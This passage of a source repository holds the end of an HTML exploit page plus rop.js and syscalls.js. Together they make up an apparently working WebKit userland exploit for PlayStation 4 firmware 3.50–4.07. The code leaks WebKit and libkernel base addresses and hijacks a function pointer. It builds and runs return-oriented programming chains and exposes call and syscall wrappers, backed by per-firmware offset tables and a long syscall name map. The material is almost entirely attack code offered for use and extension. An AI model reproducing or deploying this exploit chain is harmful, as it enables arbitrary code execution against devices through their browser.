111 |         window.syscalls = syscallMap[fwFromUA];
112 |       }
113 |       else
114 |       {
115 |         alert("Your system does not have a valid system call map! The exploit will still work but calling syscalls will not function properly...");
116 |       }
117 | 
118 |       /* Print out results */
119 |       print("WebKit Base Located - Address: 0x" + webkitBase);
120 |       print("LibKernel Base Located - Address: 0x" + libkernel);
121 | 
122 |       var funcPtrStore = p.leakFunction(parseFloat);
123 |       var funcArgs = [];
124 | 
125 |       for(var i = 0; i < 0x7FFF; i++)
126 |         funcArgs[i] = 0x41410000 | i;
127 | 
128 |       /* Ensure everything is aligned and the layout is intact */
129 |       var argBuffer = new Uint32Array(0x1000);
130 |       var argPointer = p.read8(p.leakval(argBuffer).add32(0x28));
131 |       argBuffer[0] = 0x13371337;
132 | 
133 |       if(p.read4(argPointer) != 0x13371337)
134 |       {
135 |         throw new Error("Stack frame is not aligned!");
136 |       }
137 | 
138 |       window.dont_tread_on_me = [argBuffer];
139 | 
140 |       /* Load ROP chain into memory */
141 |       p.loadchain = function(chain)
142 |       {
143 |         var stackPointer = 0;
144 |         var stackCookie = 0;
145 |         var origRIP = 0;
146 | 
147 |         var reEntry =
148 |         {
149 |           length:
150 |           {
151 |             valueOf: function()
152 |             {
153 |               origRIP = p.read8(stackPointer);
154 |               var returnToFrame = stackPointer;
155 | 
156 |               var ocnt = chain.count;
157 |               chain.push64(stackPointer, origRIP);
158 |               chain.push64(stackPointer.add32(8), stackCookie);
159 | 
160 |               if (chain.runtime) returnToFrame=chain.runtime(stackPointer);
161 | 
162 |               chain.push(window.gadgets["pop rsp"]);
163 |               chain.push(returnToFrame);
164 |               chain.count = ocnt;
165 | 
166 |               p.write8(stackPointer, window.gadgets["pop rsp"]);
167 |               p.write8(stackPointer.add32(8), chain.ropChainPtr);
168 | 
169 |               return 0;
170 |             }
171 |           }
172 |         };
173 | 
174 |         return (function()
175 |         {
176 |           /* Clear stack frame */
177 |           (function(){}).apply(null, funcArgs);
178 | 
179 |           /* Recover frame */
180 |           var orig = p.read8(funcPtrStore);
181 |           p.write8(funcPtrStore, window.gadgets["mov rax, rdi"]);
182 | 
183 |           /* Setup frame */
184 |           var trap = p.leakval(parseFloat());
185 |           var rtv = 0;
186 |           var fakeval = new int64(0x41414141, 0xffff0000);
187 | 
188 |           (function()
189 |           {
190 |             var val = p.read8(trap.add32(0x100));
191 |             if ((val.hi != 0xffff0000) || ((val.low & 0xFFFF0000) != 0x41410000))
192 |             {
193 |               throw new Error("Stack frame corrupted!");
194 |             }
195 |           }).apply(null, funcArgs);
196 | 
197 |           /* Write vtable, setjmp stub, and 'jump rax' gadget */
198 |           p.write8(argPointer, argPointer.add32(0x100));
199 |           p.write8(argPointer.add32(0x130), window.basicImports["setjmp"]);
200 |           p.write8(funcPtrStore, window.gadgets["jmp addr"]);
201 | 
202 |           /* Clear and write to frame */
203 |           (function(){}).apply(null, funcArgs);
204 |           p.write8(trap.add32(0x18), argPointer);
205 |           p.leakval(parseFloat()); // Jumps to "setjmp" function stub in libkernel
206 | 
207 |           /* Finish by resetting the stack's base pointer and canary */
208 |           stackPointer = p.read8(argPointer.add32(0x10));
209 |           stackCookie = p.read8(stackPointer.add32(8));
210 | 
211 |           rtv=Array.prototype.splice.apply(reEntry);
212 |           p.write8(trap.add32(0x18), fakeval);
213 |           p.write8(trap.add32(0x18), orig);
214 | 
215 |           return p.leakval(rtv);
216 |         }).apply(null, funcArgs);
217 |       }
218 | 
219 |       p.call = function(rip, rdi, rsi, rdx, rcx, r8, r9) {
220 |         var chain = new rop(p);
221 |         chain.call(rip, rdi, rsi, rdx, rcx, r8, r9);
222 | 
223 |         chain.push(window.gadgets["pop rdi"]);
224 |         chain.push(chain.ropChainPtr.add32(0x3ff8));
225 |         chain.push(window.gadgets["mov qword ptr [rdi], rax"]);
226 |         chain.push(window.gadgets["pop rax"]);
227 |         chain.push(p.leakval(0x41414242));
228 | 
229 |         if (chain.run().low != 0x41414242) throw new Error("unexpected rop behaviour");
230 | 
231 |         /*
232 |           Originally for some reason, it will read in hex, so .toString(10)
233 |           converts back to decimal.
234 |         */
235 |         return p.read8(chain.ropChainPtr.add32(0x3ff8)).toString(10);
236 |       }
237 | 
238 |       p.syscall = function(sysc, rdi, rsi, rdx, rcx, r8, r9)
239 |       {
240 |         if (typeof sysc == "string")
241 |         {
242 |           sysc = window.syscallnames[sysc];
243 |         }
244 | 
245 |         if (typeof sysc != "number")
246 |         {
247 |           throw new Error("System call map does not contain an index for this syscall!");
248 |         }
249 | 
250 |         var off = window.syscalls[sysc];
251 |         if (off == undefined)
252 |         {
253 |           throw new Error("System call map does not contain an index for this syscall!");
254 |         }
255 | 
256 |         return p.call(libkernel.add32(off), rdi, rsi, rdx, rcx, r8, r9);
257 |       }
258 | 
259 |       p.readstr = function(addr){
260 |         var addr_ = addr.add32(0);
261 |         var rd = p.read4(addr_);
262 |         var buf = "";
263 |         while (rd & 0xFF)
264 |         {
265 |           buf += String.fromCharCode(rd & 0xFF);
266 |           addr_.add32inplace(1);
267 |           rd = p.read4(addr_);
268 |         }
269 |         return buf;
270 |       }
271 | 
272 | 
273 | 
274 | 
275 |       /*
276 |         Everything above this line (275) does NOT NEED TO BE TOUCHED, that is,
277 |         if you don't care about breaking things or you for some reason want to
278 |         edit the core setup, which you shouldn't need to do. Everything below is
279 |         ez mode.
280 |       */
281 | 
282 |       var idx = 0;
283 | 
284 |       window.trycall = function() {
285 |         print("call ret: " + p.call(window.gadgets["mov rax, rdi"], idx));
286 |         idx++;
287 |       }
288 | 
289 |       window.getPID = function() {
290 |         print("sys_getpid(): " + p.syscall("sys_getpid"));
291 |       }
292 | 
293 |       window.getUID = function() {
294 |         print("sys_getuid(): " + p.syscall("sys_getuid"));
295 |       }
296 | 
297 |       print("<a href=javascript:window.trycall();>try call</a>");
298 |       print("<a href=javascript:window.getPID();>try sys_getpid()</a>");
299 |       print("<a href=javascript:window.getUID();>try sys_getuid()</a>");
300 |     }
301 |   </script>
302 |   <script src=expl.js></script>
303 |   <script src=gadgets.js></script>
304 |   <script src=rop.js></script>
305 |   <center><h1 id=clck>...</h1><strong>By <a href='https://twitter.com/qwertyoruiopz'>qwertyoruiopz</a></strong><br/>Edited by <a href='https://twitter.com/specterdev'>SpecterDev</a><br/>This exploit has been cleaned up a bit and now has multi-firmware support!<br/></center>
306 |   <pre id="console" style="font-size: 20px"></pre>
307 | </body>
308 | </html>
309 | 


--------------------------------------------------------------------------------
/rop.js:
--------------------------------------------------------------------------------
 1 | /* Leave these values untouched, they will be set properly post-exploitation */
 2 | var moduleBaseAddresses =
 3 | {
 4 |   'libkernel': 0,
 5 |   'libSceWebKit2': 0
 6 | };
 7 | 
 8 | /* Simply adds given offset to given module's base address */
 9 | function getGadget(moduleName, offset)
10 | {
11 |   return moduleBaseAddresses[moduleName].add32(offset);
12 | }
13 | 
14 | /* Called to start a new ROP chain */
15 | var rop = function(p) {
16 |   this.ropChain = new Uint32Array(0x1000);
17 |   this.ropChainPtr = p.read8(p.leakval(this.ropChain).add32(0x28));
18 |   this.count = 0;
19 | 
20 |   /* Clears the chain */
21 |   this.clear = function() {
22 |     this.count = 0;
23 |     this.runtime = undefined;
24 | 
25 |     for (var i = 0; i < 0xFF0 / 2; i++)
26 |     {
27 |       p.write8(this.ropChainPtr.add32(i*8), 0);
28 |     }
29 |   };
30 | 
31 |   /* Gets the current chain index and increments it */
32 |   this.getChainIndex = function() {
33 |     this.count++;
34 |     return this.count-1;
35 |   }
36 | 
37 |   /* Pushes a gadget or value on the stack */
38 |   this.push = function(val) {
39 |     p.write8(this.ropChainPtr.add32(this.getChainIndex() * 8), val);
40 |   }
41 | 
42 |   /* Writes a 64-bit value to given location */
43 |   this.push64 = function(where, what)
44 |   {
45 |     this.push(window.gadgets["pop rdi"]);
46 |     this.push(where);
47 |     this.push(window.gadgets["pop rsi"]);
48 |     this.push(what);
49 |     this.push(window.gadgets["mov qword ptr [rdi], rsi"]);
50 |   }
51 | 
52 |   /* Sets up a function call into a module by address */
53 |   this.call = function (rip, rdi, rsi, rdx, rcx, r8, r9)
54 |   {
55 |     this.push(window.gadgets["pop rdi"]);
56 |     this.push(rdi);
57 |     this.push(window.gadgets["pop rsi"]);
58 |     this.push(rsi);
59 |     this.push(window.gadgets["pop rdx"]);
60 |     this.push(rdx);
61 |     this.push(window.gadgets["pop rcx"]);
62 |     this.push(rcx);
63 |     this.push(window.gadgets["pop r8"]);
64 |     this.push(r8);
65 |     this.push(window.gadgets["pop r9"]);
66 |     this.push(r9);
67 |     this.push(rip);
68 |     return this;
69 |   }
70 | 
71 |   /* Loads the ROP chain and initializes it */
72 |   this.run = function() {
73 |     var retv = p.loadchain(this);
74 |     this.clear();
75 | 
76 |     return retv;
77 |   }
78 |   return this;
79 | };
80 | 


--------------------------------------------------------------------------------
/syscalls.js:
--------------------------------------------------------------------------------
  1 | /* Holds system call wrapper offsets for user's specific firmware */
  2 | window.syscalls = [];
  3 | 
  4 | /* These are the offsets in libkernel for system call wrappers */
  5 | window.syscallMap =
  6 | {
  7 |   '3.50':
  8 |   {
  9 |     20: 0xACE0,
 10 |     24: 0xAD60
 11 |   },
 12 | 
 13 |   '3.55':
 14 |   {
 15 |     20: 0xACE0,
 16 |     24: 0xAD60
 17 |   },
 18 | 
 19 |   '3.70':
 20 |   {
 21 |     20: 0xACE0,
 22 |     24: 0xAD60
 23 |   },
 24 | 
 25 |   '4.00':
 26 |   {
 27 |     20: 0x06F0,
 28 |     24: 0x0730
 29 |   },
 30 | 
 31 |   '4.06':
 32 |   {
 33 |     20: 0x06F0,
 34 |     24: 0x0730
 35 |   },
 36 | 
 37 |   '4.07':
 38 |   {
 39 |     20: 0x06F0,
 40 |     24: 0x0730
 41 |   }
 42 | }
 43 | 
 44 | /* A long ass map of system call names -> number, you shouldn't need to touch this */
 45 | window.syscallnames =
 46 | {
 47 | 	"sys_exit": 1,
 48 | 	"sys_fork": 2,
 49 | 	"sys_read": 3,
 50 | 	"sys_write": 4,
 51 | 	"sys_open": 5,
 52 | 	"sys_close": 6,
 53 | 	"sys_wait4": 7,
 54 | 	"sys_unlink": 10,
 55 | 	"sys_chdir": 12,
 56 | 	"sys_chmod": 15,
 57 | 	"sys_getpid": 20,
 58 | 	"sys_setuid": 23,
 59 | 	"sys_getuid": 24,
 60 | 	"sys_geteuid": 25,
 61 | 	"sys_recvmsg": 27,
 62 | 	"sys_sendmsg": 28,
 63 | 	"sys_recvfrom": 29,
 64 | 	"sys_accept": 30,
 65 | 	"sys_getpeername": 31,
 66 | 	"sys_getsockname": 32,
 67 | 	"sys_access": 33,
 68 | 	"sys_chflags": 34,
 69 | 	"sys_fchflags": 35,
 70 | 	"sys_sync": 36,
 71 | 	"sys_kill": 37,
 72 | 	"sys_getppid": 39,
 73 | 	"sys_dup": 41,
 74 | 	"sys_pipe": 42,
 75 | 	"sys_getegid": 43,
 76 | 	"sys_profil": 44,
 77 | 	"sys_getgid": 47,
 78 | 	"sys_getlogin": 49,
 79 | 	"sys_setlogin": 50,
 80 | 	"sys_sigaltstack": 53,
 81 | 	"sys_ioctl": 54,
 82 | 	"sys_reboot": 55,
 83 | 	"sys_revoke": 56,
 84 | 	"sys_execve": 59,
 85 | 	"sys_execve": 59,
 86 | 	"sys_msync": 65,
 87 | 	"sys_munmap": 73,
 88 | 	"sys_mprotect": 74,
 89 | 	"sys_madvise": 75,
 90 | 	"sys_mincore": 78,
 91 | 	"sys_getgroups": 79,
 92 | 	"sys_setgroups": 80,
 93 | 	"sys_setitimer": 83,
 94 | 	"sys_getitimer": 86,
 95 | 	"sys_getdtablesize": 89,
 96 | 	"sys_dup2": 90,
 97 | 	"sys_fcntl": 92,
 98 | 	"sys_select": 93,
 99 | 	"sys_fsync": 95,
100 | 	"sys_setpriority": 96,
101 | 	"sys_socket": 97,
102 | 	"sys_connect": 98,
103 | 	"sys_accept": 99,
104 | 	"sys_getpriority": 100,
105 | 	"sys_send": 101,
106 | 	"sys_recv": 102,
107 | 	"sys_bind": 104,
108 | 	"sys_setsockopt": 105,
109 | 	"sys_listen": 106,
110 | 	"sys_recvmsg": 113,
111 | 	"sys_sendmsg": 114,
112 | 	"sys_gettimeofday": 116,
113 | 	"sys_getrusage": 117,
114 | 	"sys_getsockopt": 118,
115 | 	"sys_readv": 120,
116 | 	"sys_writev": 121,
117 | 	"sys_settimeofday": 122,
118 | 	"sys_fchmod": 124,
119 | 	"sys_recvfrom": 125,
120 | 	"sys_setreuid": 126,
121 | 	"sys_setregid": 127,
122 | 	"sys_rename": 128,
123 | 	"sys_flock": 131,
124 | 	"sys_sendto": 133,
125 | 	"sys_shutdown": 134,
126 | 	"sys_socketpair": 135,
127 | 	"sys_mkdir": 136,
128 | 	"sys_rmdir": 137,
129 | 	"sys_utimes": 138,
130 | 	"sys_adjtime": 140,
131 | 	"sys_getpeername": 141,
132 | 	"sys_setsid": 147,
133 | 	"sys_sysarch": 165,
134 | 	"sys_setegid": 182,
135 | 	"sys_seteuid": 183,
136 | 	"sys_stat": 188,
137 | 	"sys_fstat": 189,
138 | 	"sys_lstat": 190,
139 | 	"sys_pathconf": 191,
140 | 	"sys_fpathconf": 192,
141 | 	"sys_getrlimit": 194,
142 | 	"sys_setrlimit": 195,
143 | 	"sys_getdirentries": 196,
144 | 	"sys___sysctl": 202,
145 | 	"sys_mlock": 203,
146 | 	"sys_munlock": 204,
147 | 	"sys_futimes": 206,
148 | 	"sys_poll": 209,
149 | 	"sys_clock_gettime": 232,
150 | 	"sys_clock_settime": 233,
151 | 	"sys_clock_getres": 234,
152 | 	"sys_ktimer_create": 235,
153 | 	"sys_ktimer_delete": 236,
154 | 	"sys_ktimer_settime": 237,
155 | 	"sys_ktimer_gettime": 238,
156 | 	"sys_ktimer_getoverrun": 239,
157 | 	"sys_nanosleep": 240,
158 | 	"sys_rfork": 251,
159 | 	"sys_issetugid": 253,
160 | 	"sys_getdents": 272,
161 | 	"sys_preadv": 289,
162 | 	"sys_pwritev": 290,
163 | 	"sys_getsid": 310,
164 | 	"sys_aio_suspend": 315,
165 | 	"sys_mlockall": 324,
166 | 	"sys_munlockall": 325,
167 | 	"sys_sched_setparam": 327,
168 | 	"sys_sched_getparam": 328,
169 | 	"sys_sched_setscheduler": 329,
170 | 	"sys_sched_getscheduler": 330,
171 | 	"sys_sched_yield": 331,
172 | 	"sys_sched_get_priority_max": 332,
173 | 	"sys_sched_get_priority_min": 333,
174 | 	"sys_sched_rr_get_interval": 334,
175 | 	"sys_sigprocmask": 340,
176 | 	"sys_sigprocmask": 340,
177 | 	"sys_sigsuspend": 341,
178 | 	"sys_sigpending": 343,
179 | 	"sys_sigtimedwait": 345,
180 | 	"sys_sigwaitinfo": 346,
181 | 	"sys_kqueue": 362,
182 | 	"sys_kevent": 363,
183 | 	"sys_uuidgen": 392,
184 | 	"sys_sendfile": 393,
185 | 	"sys_fstatfs": 397,
186 | 	"sys_ksem_close": 400,
187 | 	"sys_ksem_post": 401,
188 | 	"sys_ksem_wait": 402,
189 | 	"sys_ksem_trywait": 403,
190 | 	"sys_ksem_init": 404,
191 | 	"sys_ksem_open": 405,
192 | 	"sys_ksem_unlink": 406,
193 | 	"sys_ksem_getvalue": 407,
194 | 	"sys_ksem_destroy": 408,
195 | 	"sys_sigaction": 416,
196 | 	"sys_sigreturn": 417,
197 | 	"sys_getcontext": 421,
198 | 	"sys_setcontext": 422,
199 | 	"sys_swapcontext": 423,
200 | 	"sys_sigwait": 429,
201 | 	"sys_thr_create": 430,
202 | 	"sys_thr_exit": 431,
203 | 	"sys_thr_self": 432,
204 | 	"sys_thr_kill": 433,
205 | 	"sys_ksem_timedwait": 441,
206 | 	"sys_thr_suspend": 442,
207 | 	"sys_thr_wake": 443,
208 | 	"sys_kldunloadf": 444,
209 | 	"sys__umtx_op": 454,
210 | 	"sys__umtx_op": 454,
211 | 	"sys_thr_new": 455,
212 | 	"sys_sigqueue": 456,
213 | 	"sys_thr_set_name": 464,
214 | 	"sys_rtprio_thread": 466,
215 | 	"sys_pread": 475,
216 | 	"sys_pwrite": 476,
217 | 	"sys_mmap": 477,
218 | 	"sys_lseek": 478,
219 | 	"sys_truncate": 479,
220 | 	"sys_ftruncate": 480,
221 | 	"sys_thr_kill2": 481,
222 | 	"sys_shm_open": 482,
223 | 	"sys_shm_unlink": 483,
224 | 	"sys_cpuset_getid": 486,
225 | 	"sys_cpuset_getaffinity": 487,
226 | 	"sys_cpuset_setaffinity": 488,
227 | 	"sys_openat": 499,
228 | 	"sys_pselect": 522,
229 | 
230 |   "sys_regmgr_call": 532,
231 |   "sys_jitshm_create": 533,
232 |   "sys_jitshm_alias": 534,
233 |   "sys_dl_get_list": 535,
234 |   "sys_dl_get_info": 536,
235 |   "sys_dl_notify_event": 537,
236 | 	"sys_evf_create": 538,
237 | 	"sys_evf_delete": 539,
238 | 	"sys_evf_open": 540,
239 | 	"sys_evf_close": 541,
240 | 	"sys_evf_wait": 542,
241 | 	"sys_evf_trywait": 543,
242 | 	"sys_evf_set": 544,
243 | 	"sys_evf_clear": 545,
244 | 	"sys_evf_cancel": 546,
245 | 	"sys_query_memory_protection": 547,
246 | 	"sys_batch_map": 548,
247 | 	"sys_osem_create": 549,
248 | 	"sys_osem_delete": 550,
249 | 	"sys_osem_open": 551,
250 | 	"sys_osem_close": 552,
251 | 	"sys_osem_wait": 553,
252 | 	"sys_osem_trywait": 554,
253 | 	"sys_osem_post": 555,
254 | 	"sys_osem_cancel": 556,
255 | 	"sys_namedobj_create": 557,
256 |   "sys_namedobj_delete": 558,
257 |   "sys_set_vm_container": 559,
258 |   "sys_debug_init": 560,
259 |   "sys_suspend_process": 561,
260 |   "sys_resume_process": 562,
261 |   "sys_opmc_enable": 563,
262 |   "sys_opmc_disable": 564,
263 |   "sys_opmc_set_ctl": 565,
264 |   "sys_opmc_set_ctr": 566,
265 |   "sys_opmc_get_ctr": 567,
266 |   "sys_budget_create": 568,
267 |   "sys_budget_delete": 569,
268 |   "sys_budget_get": 570,
269 |   "sys_budget_set": 571,
270 |   "sys_virtual_query": 572,
271 |   "sys_mdbg_call": 573,
272 |   "sys_sblock_create": 574,
273 |   "sys_sblock_delete": 575,
274 |   "sys_sblock_enter": 576,
275 |   "sys_sblock_exit": 577,
276 |   "sys_sblock_xenter": 578,
277 |   "sys_sblock_xexit": 579,
278 |   "sys_eport_create": 580,
279 |   "sys_eport_delete": 581,
280 |   "sys_eport_trigger": 582,
281 |   "sys_eport_open": 583,
282 |   "sys_eport_close": 584,
283 |   "sys_is_in_sandbox": 585,
284 |   "sys_dmem_container": 586,
285 |   "sys_get_authinfo": 587,
286 |   "sys_mname": 588,
287 |   "sys_dynlib_dlopen": 589,
288 |   "sys_dynlib_dlclose": 590,
289 |   "sys_dynlib_dlsym": 591,
290 |   "sys_dynlib_get_list": 592,
291 |   "sys_dynlib_get_info": 593,
292 |   "sys_dynlib_load_prx": 594,
293 |   "sys_dynlib_unload_prx": 595,
294 |   "sys_dynlib_do_copy_relocations": 596,
295 |   "sys_dynlib_prepare_dlclose": 597,
296 |   "sys_dynlib_get_proc_param": 598,
297 |   "sys_dynlib_process_needed_and_relocate": 599,
298 |   "sys_sandbox_path": 600,
299 |   "sys_mdbg_service": 601,
300 |   "sys_randomized_path": 602,
301 |   "sys_rdup": 603,
302 |   "sys_dl_get_metadata": 604,
303 |   "sys_workaround8849": 605,
304 |   "sys_is_development_mode": 606,
305 |   "sys_get_self_auth_info": 607,
306 |   "sys_dynlib_get_info_ex": 608,
307 |   "sys_budget_get_ptype": 610,
308 |   "sys_budget_getid": 609,
309 |   "sys_get_paging_stats_of_all_threads": 611,
310 |   "sys_get_proc_type_info": 612,
311 |   "sys_get_resident_count": 613,
312 |   "sys_prepare_to_suspend_process": 614,
313 |   "sys_get_resident_fmem_count": 615,
314 |   "sys_thr_get_name": 616,
315 |   "sys_set_gpo": 617
316 | }
317 | 


--------------------------------------------------------------------------------